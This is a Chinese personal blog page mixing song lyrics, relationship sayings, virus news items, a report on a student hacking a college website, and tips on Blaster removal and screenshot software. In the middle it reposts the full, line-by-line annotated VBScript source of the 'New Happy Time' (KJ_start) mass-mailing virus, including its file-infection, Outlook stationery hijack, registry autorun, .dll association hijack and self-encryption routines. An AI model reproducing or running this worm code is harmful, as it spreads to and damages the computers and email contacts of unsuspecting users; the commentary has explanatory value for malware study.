| 王磊's profile小石头PhotosBlogLists | Help |
小石头美丽的彩虹 |
June 10 6月10日 2:49午夜遇见了好久好久没见到的甜子,聊了会,我惊讶他也很惊讶,因为
能遇到以前助手的朋友真的很难得。
又这么晚睡觉,MSN spaces 好久没有弄了,改了改格局和颜色,弄了好久浪费时间。一打开MSN spaces 计算机就非常的慢。明天晚上肯定不开机,省着晚上忘记时间睡得晚。
July 13 好音乐本人觉得是好听音乐,不过如果您觉得不是,你可以不予以采纳。
歌曲编排不分先后次序
歌曲名称:晴天时候不要说再见(醋溜族插曲)
演唱歌手:佟大为VS范玮琪 歌词: 《晴天时候不要说再见》 范范&大为 晴天时候我们不要说再见
就算伤心也要选对的时间 谁想重来一遍 谁还在等待……谁还在等待 下雨天…… 最后还是泪湿了眼
僵持在这经常来的公园 最后我们不知不觉 站了整天沉默太久的街 下午三点不适合面对面 容易成为焦点 我把脆弱留在身边 不想让你发现 终于就在这个时间这个地点
决定划上句点 虽然不曾事过境迁 对你的思念还留在爱的空间 这段感情谁也不说抱歉 只用微笑终结 只是双手依然紧握胸前 舍不得改变 舍不得弃权 晴天时候我们不要说再见
就算伤心也要选对的时间 保留最后期限 就在你说分手之前 晴天时候我们不要说再见
就为了坚持那些扣人心弦 谁想重来一遍 谁还在等待……谁还在等待 下雨天…… 如果当初没有呈现
今天怎么会犹豫不决 雨天我不想怀念 晴天就别说再见 ![]() ![]() ------end------
名称:寂寞的季节
演唱:陶喆 专辑:乐之路1997-2003 作词:娃娃作曲:陶喆 风吹落最后一片叶
我的心也飘着雪 爱只能往回忆里堆叠 oh~给下个季节 忽然间树梢冒花蕊 我怎么会都没有感觉 oh~整条街都是恋爱的人 我独自走在暖风的夜 多想要向过去告别 当季节不停更迭 oh~ 却还是少一点坚决 在这寂寞的季节 艳阳高照在那海边 爱情盛开的世界 远远看著热闹一切 oh~我记得那狂烈 窗外是快枯黄的叶 感伤在心中有一些 oh~ 我了解那些爱过的人 心是如何慢慢在凋谢 多想要向过去告别 当季节不停更迭 oh~ 却永远少一点坚决 在这寂寞的季节 又走过风吹的冷冽 最后一盏灯熄灭 从回忆我慢慢穿越 在这寂寞的季节 还是寂寞的季节 一样寂寞的季节 ------end------
歌曲:原来
歌手:林俊杰 专辑:曹操 词:张思尔 林秋离曲:林俊杰 街灯绊住我眼前
下一步 拉长的影子 嘲弄的回顾 电话亭仍留着你的话 一句话掉一滴泪 今晚的我会是如何入睡 原来最疼痛的表情竟是没有情绪 原来最残忍的画面可以甜言蜜语 我不懂得如何更爱你 影子讽刺地跟着我难分难离 原来最孤单的是我还是那么想你 原来最悲哀的是我不能面对自己 你收的干净 我也会不留一点痕迹 说故事也要像是真的 可是别触动那些回忆 今夜你说了最后一句 一句话掉一滴泪 看来今晚的我很难入睡 ------end------
歌曲:那一年,这一天
歌手:任贤齐&舒淇 专辑:两极 女:抱紧一点点
以为还有永远 只听见呼吸里爱恨在沉淀 谁都不愿意先说抱歉 男:晒伤的夏天 反方向把我们拉远 合:我低着头向前 想走出你的世界 却跨进了秋天 那一年 带不到今天 无所谓谁拖谁欠 也许男人对爱的极限 是继续相信永远 这一天 回不到那年 小小幸福我们腻好几天 如果爱逃不过改变 不如承认 对于单纯的爱恋 我们都太怀念 男:抱紧一点点
以为还有永远 只是你呼吸里无情太明显 我又何苦追问你的眼 女:晒伤的夏天 反方向把我们拉远 合:我低着头向前 想走出你的世界 却跨进了秋天 那一年 带不到今天 无所谓谁拖谁欠 也许男人对爱的极限 是继续相信永远 这一天 回不到那年 小小幸福我们腻好几天 如果爱逃不过改变 不如承认 对于单纯的爱恋 我们都太怀念 女:我们都太怀念
那一年这一天 男:那一年 带不到今天 无所谓谁拖谁欠 也许男人对爱的极限 合:是继续相信永远 这一天回不到那年 小小幸福我们腻好几天 如果爱逃不过改变 不如承认 对于单纯的爱恋 我们都太怀念 ------end------ 歌曲:原来你也在这里
歌手:刘若英 专辑:我的失败与伟大 作词:姚谦 作曲:中岛美雪 编曲:屠颖 请允许我尘埃落定用沉默埋葬了过去
满身风雨我从海上来才隐居在这沙漠里 该隐瞒的事总清晰千言万语只能无语 爱是天时地利的迷信喔原来你也在这里 啊哪一个人是不是只存在梦境里 为什么我用尽全身力气 却换来半生回忆 若不是你渴望眼睛若不是我救赎心情 在千山万水人海相遇喔原来你也在这里 ------end------ June 30 "定律" 情人定律:想当女人的初恋情人;女人想做男人的最后情人。
初坠情网定律:女人姣好的长相,是使男人迅速坠入情网的“导火线”。男人的“甜言蜜语”,使女人乐于被拉下爱河。
求爱定律:男人追求女人,如隔着一座山--难;女人追求男人,如隔着一层纸--易。尽管如此,实际生活中男人往往能追到他喜欢的女人,而女人却得不到她爱恋的男人,原因是:男人不怕翻山越岭,女人却怕伤了手指头。 热恋定律:男人热恋时有用不完的聪明;女人热恋时却易变得愚蠢。 考验定律:男人考验女人的方法是远走高飞;女人考验男人的方式是约会迟到。 目的定律:男人为结婚而恋爱,女人为爱情而结婚。
结婚定律:男人结婚是因为无聊,女人结婚则是因为好奇。结婚后双方都很失望。 夫妻定律:父亲——兄长——弟弟;母亲——姐姐——妹妹。需要什么时就变出什么样子来。 婚前婚后定律:婚前,男人说:“你是我的一切。”女人会说:“我属于你。”婚后,男人会说:“我是你的一切。”女人会说:“你属于我。” June 18 Worm.Viking.bo一个多功能混合型病毒正在互联网上快速传播,该病毒被命名为“威金蠕虫变种BO(Worm.Viking.bo)”病毒。瑞星反病毒专家介绍说,该病毒同时具有文件型病毒、蠕虫病毒、病毒下载器等类病毒的特点,进入用户的电脑之后,它会从网上疯狂下载多个木马、QQ尾巴等安装在中毒电脑中,窃取用户的网络游戏密码,严重时造成系统完全崩溃。 截至5日14点,共有9600余名个人用户和10余家企业用户被该病毒感染。病毒会扫描局域网中的所有共享计算机,尝试猜解它们的密码,并试图感染这些计算机。病毒的传播、扫描、网络下载等会消耗大量资源,局域网中只要有一台机器中毒,就可能造成全网运行不正常,甚至造成网络堵塞。中毒后,必须采用具备全局管理功能的网络版杀毒软件才能彻底清除。
新欢乐时光 源分析新欢乐时光病毒程序源码分析 VBS VBSCript源程序
小石头注解:在网上上找到这个源代码,并附有详细的注释说明,这程序对学习提高编程水平还是很有用的,就收藏下来了。
Dim Inwhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start() ' 初始化变量 KJSetDim() ' 初始化环境 KJcreateMilieu() ' 感染本地或者共享上与html所在目录 KJlikeIt() ' 通过vbs感染Outlook邮件模板 KJcreateMail() ' 进行病毒传播 KJPropagate() End Sub ' 函数:KJAppendTo(FilePath,TypeStr)
' 功能:向指定类型的指定文件追加病毒 ' 参数: ' FilePath 指定文件路径 ' TypeStr 指定类型 Function KJAppendTo(FilePath,TypeStr) On Error Resume Next ' 以只读方式打开指定文件 Set ReadTemp = FSO.OpenTextFile(FilePath,1) ' 将文件内容读入到TmpStr变量中 TmpStr = ReadTemp.ReadAll ' 判断文件中是否存在"KJ_start()"字符串,若存在说明已经感染,退出函数; ' 若文件长度小于1,也退出函数。 If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then ReadTemp.Close Exit Function End If ' 如果传过来的类型是"htt" ' 在文件头加上调用页面的时候加载KJ_start()函数; ' 在文件尾追加html版本的加密病毒体。 ' 如果是"html" ' 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体; ' 如果是"vbs" ' 在文件尾追加vbs版本的病毒体 If TypeStr = "htt" Then ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,2) FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText FileTemp.Close Set FAttrib = FSO.GetFile(FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,8) If TypeStr = "html" Then FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText ElseIf TypeStr = "vbs" Then FileTemp.Write vbCrLf & VbsText End If FileTemp.Close End If End Function ' 函数:KJChangeSub(CurrentString,LastIndexChar)
' 功能:改变子目录以及盘符 ' 参数: ' CurrentString 当前目录 ' LastIndexChar 上一级目录在当前路径中的位置 Function KJChangeSub(CurrentString,LastIndexChar) ' 判断是否是根目录 If LastIndexChar = 0 Then ' 如果是根目录 ' 如果是C:\,返回FinalyDisk盘,并将SubE置为0, ' 如果不是C:\,返回将当前盘符递减1,并将SubE置为0 If Left(LCase(CurrentString),1) =< LCase("c") Then KJChangeSub = FinalyDisk & ":\" SubE = 0 Else KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\" SubE = 0 End If Else ' 如果不是根目录,则返回上一级目录名称 KJChangeSub = Mid(CurrentString,1,LastIndexChar) End If End Function ' 函数:KJcreateMail()
' 功能:感染邮件部分 Function KJcreateMail() On Error Resume Next ' 如果当前执行文件是"html"的,就退出函数 If Inwhere = "html" Then Exit Function End If ' 取系统盘的空白页的路径 ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm" ' 如果存在这个文件,就向其追加html的病毒体 ' 否则生成含有病毒体的这个文件 If (FSO.FileExists(ShareFile)) Then Call KJAppendTo(ShareFile,"html") Else Set FileTemp = FSO.OpenTextFile(ShareFile,2,true) FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText FileTemp.Close End If ' 取得当前用户的ID和OutLook的版本 DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID") OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer") ' 激活信纸功能,并感染所有信纸 WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile) Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile) WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank") Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank") WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank") KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery") End Function ' 函数:KJcreateMilieu() ' 功能:创建系统环境 Function KJcreateMilieu() On Error Resume Next TempPath = "" ' 判断操作系统是NT/2000还是9X If Not(FSO.FileExists(WinPath & "WScript.exe")) Then TempPath = "system32\" End If ' 为了文件名起到迷惑性,并且不会与系统文件冲突。 ' 如果是NT/2000则启动文件为system\Kernel32.dll ' 如果是9x启动文件则为system\Kernel.dll If TempPath = "system32\" Then StartUpFile = WinPath & "SYSTEM\Kernel32.dll" Else StartUpFile = WinPath & "SYSTEM\Kernel.dll" End If ' 添加Run值,添加刚才生成的启动文件路径 WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile ' 拷贝前期备份的文件到原来的目录 FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt" FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini" ' 向%windir%\web\Folder.htt追加病毒体 Call KJAppendTo(WinPath & "web\Folder.htt","htt") ' 改变dll的MIME头 ' 改变dll的默认图标 ' 改变dll的打开方式 WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile" WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\") WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}" ' 启动时加载的病毒文件中写入病毒体 Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true) FileTemp.Write VbsText FileTemp.Close End Function ' 函数:KJlikeIt()
' 功能:针对html文件进行处理,如果访问的是本地的或者共享上的文件,将感染这个目录 Function KJlikeIt() ' 如果当前执行文件不是"html"的就退出程序 If Inwhere <> "html" Then Exit Function End If ' 取得文档当前路径 ThisLocation = document.location ' 如果是本地或网上共享文件 If Left(ThisLocation, 4) = "file" Then ThisLocation = Mid(ThisLocation,9) ' 如果这个文件扩展名不为空,在ThisLocation中保存它的路径 If FSO.GetExtensionName(ThisLocation) <> "" then ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation))) End If ' 如果ThisLocation的长度大于3就尾追一个"\" If Len(ThisLocation) > 3 Then ThisLocation = ThisLocation & "\" End If ' 感染这个目录 KJummageFolder(ThisLocation) End If End Function ' 函数:KJMailReg(RegStr,FileName)
' 功能:如果注册表指定键值不存在,则向指定位置写入指定文件名 ' 参数: ' RegStr 注册表指定键值 ' FileName 指定文件名 Function KJMailReg(RegStr,FileName) On Error Resume Next ' 如果注册表指定键值不存在,则向指定位置写入指定文件名 RegTempStr = WsShell.RegRead(RegStr) If RegTempStr = "" Then WsShell.RegWrite RegStr,FileName End If End Function ' 函数:KJOboSub(CurrentString)
' 功能:遍历并返回目录路径 ' 参数: ' CurrentString 当前目录 Function KJOboSub(CurrentString) SubE = 0 TestOut = 0 Do While True TestOut = TestOut + 1 If TestOut > 28 Then CurrentString = FinalyDisk & ":\" Exit Do End If On Error Resume Next ' 取得当前目录的所有子目录,并且放到字典中 Set ThisFolder = FSO.GetFolder(CurrentString) Set DicSub = createObject("Scripting.Dictionary") Set Folders = ThisFolder.SubFolders FolderCount = 0 For Each TempFolder in Folders FolderCount = FolderCount + 1 DicSub.add FolderCount, TempFolder.Name Next ' 如果没有子目录了,就调用KJChangeSub返回上一级目录或者更换盘符,并将SubE置1 If DicSub.Count = 0 Then LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1) SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) SubE = 1 Else ' 如果存在子目录 ' 如果SubE为0,则将CurrentString变为它的第1个子目录 If SubE = 0 Then CurrentString = CurrentString & DicSub.Item(1) & "\" Exit Do Else ' 如果SubE为1,继续遍历子目录,并将下一个子目录返回 j = 0 For j = 1 To FolderCount If LCase(SubString) = LCase(DicSub.Item(j)) Then If j < FolderCount Then CurrentString = CurrentString & DicSub.Item(j+1) & "\" Exit Do End If End If Next LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1) SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) End If End If Loop KJOboSub = CurrentString End Function ' 函数:KJPropagate()
' 功能:病毒传播 Function KJPropagate() On Error Resume Next RegPathvalue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree" DiskDegree = WsShell.RegRead(RegPathvalue) ' 如果不存在Degree这个键值,DiskDegree则为FinalyDisk盘 If DiskDegree = "" Then DiskDegree = FinalyDisk & ":\" End If ' 继DiskDegree置后感染5个目录 For i=1 to 5 DiskDegree = KJOboSub(DiskDegree) KJummageFolder(DiskDegree) Next ' 将感染记录保存在"HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"键值中 WsShell.RegWrite RegPathvalue,DiskDegree End Function ' 函数:KJummageFolder(PathName)
' 功能:感染指定目录 ' 参数: ' PathName 指定目录 Function KJummageFolder(PathName) On Error Resume Next ' 取得目录中的所有文件集 Set FolderName = FSO.GetFolder(PathName) Set ThisFiles = FolderName.Files HttExists = 0 For Each ThisFile In ThisFiles FileExt = UCase(FSO.GetExtensionName(ThisFile.Path)) ' 判断扩展名 ' 若是HTM,HTML,ASP,PHP,JSP则向文件中追加HTML版的病毒体 ' 若是VBS则向文件中追加VBS版的病毒体 ' 若是HTT,则标志为已经存在HTT了 If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then Call KJAppendTo(ThisFile.Path,"html") ElseIf FileExt = "VBS" Then Call KJAppendTo(ThisFile.Path,"vbs") ElseIf FileExt = "HTT" Then HttExists = 1 End If Next ' 如果所给的路径是桌面,则标志为已经存在HTT了 If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then HttExists = 1 End If ' 如果不存在HTT ' 向目录中追加病毒体 If HttExists = 0 Then FSO.CopyFile WinPath & "system32\desktop.ini",PathName FSO.CopyFile WinPath & "web\Folder.htt",PathName End If End Function ' 函数KJSetDim()
' 定义FSO,WsShell对象 ' 取得最后一个可用磁盘卷标 ' 生成传染用的加密字串 ' 备份系统中的web\folder.htt和system32\desktop.ini Function KJSetDim() On Error Resume Next Err.Clear ' 测试当前执行文件是html还是vbs
TestIt = WScript.ScriptFullname If Err Then Inwhere = "html" Else Inwhere = "vbs" End If ' 创建文件访问对象和Shell对象
If Inwhere = "vbs" Then Set FSO = createObject("Scripting.FileSystemObject") Set WsShell = createObject("WScript.Shell") Else Set AppleObject = document.applets("KJ_guest") AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppleObject.createInstance() Set WsShell = AppleObject.GetObject() AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") AppleObject.createInstance() Set FSO = AppleObject.GetObject() End If Set DiskObject = FSO.Drives ' 判断磁盘类型 ' ' 0: Unknown ' 1: Removable ' 2: Fixed ' 3: Network ' 4: CD-ROM ' 5: RAM Disk ' 如果不是可移动磁盘或者固定磁盘就跳出循环。可能作者考虑的是网络磁盘、CD-ROM、RAM Disk都是在比较靠后的位置。呵呵,如果C:是RAMDISK会怎么样? For Each DiskTemp In DiskObject If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then Exit For End If FinalyDisk = DiskTemp.DriveLetter Next ' 此前的这段病毒体已经解密,并且存放在ThisText中,现在为了传播,需要对它进行再加密。 ' 加密算法 Dim OtherArr(3) Randomize ' 随机生成4个算子 For i=0 To 3 OtherArr(i) = Int((9 * Rnd)) Next TempString = "" For i=1 To Len(ThisText) TempNum = Asc(Mid(ThisText,i,1)) '对回车、换行(0x0D,0x0A)做特别的处理 If TempNum = 13 Then TempNum = 28 ElseIf TempNum = 10 Then TempNum = 29 End If '很简单的加密处理,每个字符减去相应的算子,那么在解密的时候只要按照这个顺序每个字符加上相应的算子就可以了。 TempChar = Chr(TempNum - OtherArr(i Mod 4)) If TempChar = Chr(34) Then TempChar = Chr(18) End If TempString = TempString & TempChar Next ' 含有解密算法的字串 UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ' 将加密好的病毒体复制给变量 ThisText ThisText = "ExeString = """ & TempString & """" ' 生成html感染用的脚本 HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" ' 生成vbs感染用的脚本 VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()" ' 取得Windows目录 ' GetSpecialFolder(n) ' 0: WindowsFolder ' 1: SystemFolder ' 2: TemporaryFolder ' 如果系统目录存在web\Folder.htt和system32\desktop.ini,则用kjwall.gif文件名备份它们。 WinPath = FSO.GetSpecialFolder(0) & "\" If (FSO.FileExists(WinPath & "web\Folder.htt")) Then FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif" End If If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif" End If End Function May 14 母亲节快乐
March 07 心中永恒的经典看过《诺丁山》(Notting Hill)的朋友,应该会对这首浪漫深情的When You Say Nothing At All感到熟悉吧。这部电影给我留下深刻印像的也就是这首歌了。Ronan Keating略带沙哑的嗓音配合着摇曳的吉它,很迷人。不过,我这里介绍的版本是由著名蓝草乡村女歌手Alison Krauss所演唱的。她甜美清澈的声音付予这首歌另一种风情,充满着女生的温柔和舒服,听起来也别有一番滋味呢。她凭借这首歌以精湛传情的演唱勇夺格莱美奖。Alison Krauss多次被评为世界最美的女声,坐拥11座格莱美奖,最著名的歌曲When you say nothing at all(永远有多远) 被无数人当作心中永恒的经典。
歌词:When You Say Nothing At All
Alison Krauss It"s amazing How you can speak right to my heart without saying a word you can light up the dark Try as I may I can never explain what I hear When you don"t say a thing 真是神奇
你竟能说中我的心意 尽管你不发一语 你可以照亮黑暗 我已竭尽所能 但我永远无法解释我所听到的 当你什么都没说 The smile on your face
lets me know that you need me There"s a truth in your eyes saying you"ll never leave me The touch of your hand says you"ll catch me wherever I fall You say it best When you say nothing at all 你脸上的笑容 使我明白你需要我 你眼里的真相 告诉我你绝不会离我而去 双手的触摸 告诉我无论我在何处跌倒,你都将扶持我 你说的真好 当你什么都没说 All day long I can hear people talking out loud But when you hold me near you drown out the crowd Try as they may, they can never define What"s been said between your heart and mine 一整天 我听到人们高谈阔论 但当你抱著我离开人群 人们努力想要知道,但他们永远不会明了 你我之心承诺了什么 下载地址:
http://www.greenren.ngo.cn/music/when_you_say_nothing_at_all.mp3
when_you_say_nothing_at_all.mp3 http://www.ee0755.com/bbs/UploadFile/2005-4/200544191957828.mp3
200544191957828.mp3 http://www.liukun.com/puzzle/SuiYi/luyson@victor/when%20you%20say%20nothing%20at%20all.mp3
when%20you%20say%20nothing%20at%20all.mp3 March 05 阴天心里 很不好受 酸酸的
不吃饭可以让 胃饥饿的感觉 压倒 心里的酸痛 错乱
======
阴天 在不开灯的房间
当所有思绪都一点一点沉淀 爱情究竟是精神鸦片 还是世纪末的无聊消遣 香烟 氲成一滩光圈 和他的照片就摆在手边 傻傻两个人 笑的多甜 开始总是分分钟都妙不可言
都以为热情它永不会灭 除了激情褪去后的那一点点倦 也许像谁说过的贪得无餍 活该应了谁说过的不知检点 总之那几年 感性赢了理性那一面 阴天 在不开灯的房间
当所有思绪都一点一点沉淀 爱恨情欲里的疑点 盲点 呼之欲出 那么明显 女孩 通通让到一边 这歌里的细微末节就算都体验 若想真明白 真要好几年 回想那一天 喧闹的喜宴 耳边响起的究竟是序曲 或完结篇? 感情不就是你情我愿 最好爱恨扯平两不相欠 感情说穿了 一人挣脱的 一人去捡 男人大可不必 百口莫辩 女人实在无须 楚楚可怜 总之那几年 你们两个没有缘 阴天 在不开灯的房间
当所有思绪都一点一点沉淀 爱情终究是精神鸦片 还是世纪末的无聊消遣 香烟 氲成一滩光圈 和他的照片就摆在手边 傻傻两个人 笑的多甜 傻傻两个人 笑的多甜 黑客攻击学校网站留QQ号 为被开除同学报仇(图)黑客攻击学校网站留QQ号 为被开除同学报仇(图) 作者:记者 杜玉飞 实习生 张博 ![]() 重庆科技学院校园网主页遭屏蔽1小时 学校否认与开除学生有关 今起黑客行为将被拘留 “伤心、痛心、寒心 !”这是昨日重庆科技学院网站上弹出的网页,因自己的同学遭到学校开除,一黑客竟攻击重庆科技学院的网站主页,以及学校内部的BBS,导致学校的主页被屏蔽1个多小时,校园BBS暂时中止运行。 黑客攻击网站并留QQ号 昨日,重庆科技学院南校区,大三学生小刘像平常一样登陆校园BBS,眼前的一幕让他大吃一惊,校园BBS被一个红黑相间的网页屏蔽者,上面写着两行标语:伤心、痛心、寒心!公平、公开、公正?标语下还有留言,“本人并无恶意,管理员同志,贵站存在漏洞”,最让小刘吃惊的是,网页还自报家门,留下了网名和QQ号码。 据小刘介绍,中午12时起,重庆科技学院的主页就被该网页屏蔽,直到中午1时许,主页才恢复正常,而学校的BBS科院金桥论坛,被屏蔽1个小时候后挂出公告,称因论坛数据调整,论坛暂时关闭几天。 黑主页只为同学遭开除? 昨日下午,记者根据黑客留下的QQ号,与自报家门的“退着走的人”聊天,据“退着走的人”介绍,他的同学遭开除了,感觉很不满,于是决定“中午12点黑学校主页,顺便就黑了金桥(学校论坛)”。 记者与“退着走的人”聊天时,他显得特别谨慎,不断地试探记者是不是网络管理员,当记者向他请教攻击的方法时,“退着走的人”嘱咐“不搞破坏”,并称比较复杂,以后慢慢说,但不能再“黑”学校的网站。 学校正在调查被黑一事 重庆科技学院网络中心证实了此事,称攻击网站属于违法行为,学校正在调查之中,黑客攻击一事不便透露。该校宣传部部长李军良表示,黑客攻击网络比较正常,与开除学生一事没有联系。诚信是和谐社会的一块基石,学校是“流着泪”处理作弊学生,严格按照教育部规定的执行,但情不能大于法,合情必须建立在理性的基础上。他呼吁社会各界理性地对待此事。 “黑客”行为将被拘留 根据今日起实施的《治安管理处罚法》,“黑客”侵入计算机系统,将被拘留。法律明确规定:违反国家规定,侵入计算机信息系统,造成危害的;对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行的;对计算机信息系统中存储、处理、传输的数据和应用程序进行删除、修改、增加的;故意制作、传播计算机病毒等破坏性程序,影响计算机信息系统正常运行的,情节轻微将处5日以下拘留;情节较重的,处5日以上10日以下拘留。 编辑 朱玉洁 删除冲击波病毒感染a.启动项目 1.ctfmon.exe E:\windows\system32\ctfmon.exe 任务拦输入法图标是off的 可以换成:internat.exe(自由选择项) 2.PHime2002async E:\windows\system32\IME\Tintlgnt\tintsetp.exe /sync 启动微软拼音输入法2002a 如果不用则删除!(冲击波易驻留寄生修改处) 3.UserFaultCneck %systemroot%system32\dunprep o-u 必须删除! 4.PHime2002a E:\windows\system32\IME\tintlgnt\tintsetp.exe /IMEName 启动微软拼音输入法2002a 如果不用删除之!(冲击波易驻留寄生修改处) 5.ShutdownEventCheck %systemroot%\system32\dumprep o-s 必须删除! b.处理意见:1.如果不用微软拼音输入法,删除 [2] 和 [4] 项 2.留第一项输入法图标 3.删除 [3]和 [5] 项 是冲击波病毒! 4.在windows\system32\dumprep.exe 一定要删除之! 5.同时在启动项目中删除 [3] 和 [5] 项 6.设置-面板-管理工具-服务:选择 remote procedure call(rpc)服务.双击它 推荐一款裁图工具就图像截取工具而言,SnagIt功能是比较完备的,无论是Windows界面下的屏幕图像截取还是DOS界面下的屏幕图像截取,也无论是静态屏幕图像截取还是视频图像截取,SnagIt均可以轻松搞定。 另外在截取图像的后期编辑方面,软件提供的众多近似专业的图像编辑工具可以对所截取的图像进行各种形式的编辑,包括美化图像及在图像中进行各种标注等,所以这款SnagIt一直是众多朋友的首选工具。 最近SnagIt又推出了其全新的v8.0版本,这个版本重写了全新的软件界面,另外又增加许多让人耳目一新的实用功能,变化的确很大。怪怪与大家一起体验SnagIt 8.0的多项全新功能。
先来看看它的软件小档案: 软件名称: SnagIt 下载地址:
详情如下地址 http://forum.ikaka.com/topic.asp?board=3&artid=7800963&page=1 不转了 累 十二招完全掌握Windows系统还原其实平时工作 谁哪有那么多时间 去搞操作系统啊 时间长了 看到系统坏了耽误事情多烦啊
电脑是用来学习工作的不是用来安装系统玩的
XP的还原功能大家使用这么多年了,是否就真的对这项系统有着很深入的了解呢?本文试着为大家再深入分析一下这项系统,看里面还隐藏着什么秘密。
1.什么是系统恢复?
